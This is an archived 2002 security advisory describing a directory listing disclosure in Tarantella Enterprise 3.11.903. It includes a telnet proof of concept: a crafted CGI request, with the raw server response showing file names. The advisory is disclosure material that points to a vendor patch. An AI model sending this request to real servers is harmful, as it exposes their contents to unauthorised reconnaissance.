Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps N-Z :: lnx5030.htm

Tarantella Enterprise 3.11.903 directory index disclosure



25th Jan 2002 [SBWID-5030]
COMMAND

	Tarantella Enterprise 3.11.903 directory index disclosure

SYSTEMS AFFECTED

	Tarantella Enterprise 3.11.903

PROBLEM

	In Chieh-Chun Lin ISSTW Advisory [iss.com.tw] :
	

	

	

	-- snip --
	

	 Exploit : (self explanatory)

	 =======

	

	

	shell$ telnet tarantella.somewhere.com 80

	Trying 12.34.56.78...

	Connected to 12.34.56.78.

	Escape character is \'^]\'.

	GET /cgi-bin/ttawebtop.cgi/?action=start&pg= HTTP/1.0

	

	HTTP/1.1 200 OK

	Date: Fri, 21 Dec 2001 11:34:39 GMT

	Server: Apache/1.3.4 (Unix)

	Content-length: 512

	Connection: close

	Content-Type: text/html

	

	  ?C  .      ..    4    cgi-bin   ?E   direct.html

	   on    examples      ?    

	help      ?Y  

	index.html    ?Z   index2.html   ?[  

	kiosk.html    ?\\   kiosk2.html   ?]   loader.html   %

	  mac   -v   resources

	native   5     java      ?w    index2.html.orig      

	o   modules   b    tsp les

	x    resources.3_11.tar    ,w 

	resources.old 

	

	-- snap --

SOLUTION

	Get patch from URL below
	

	http://www.tarantella.com/security/bulletin-03.html

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH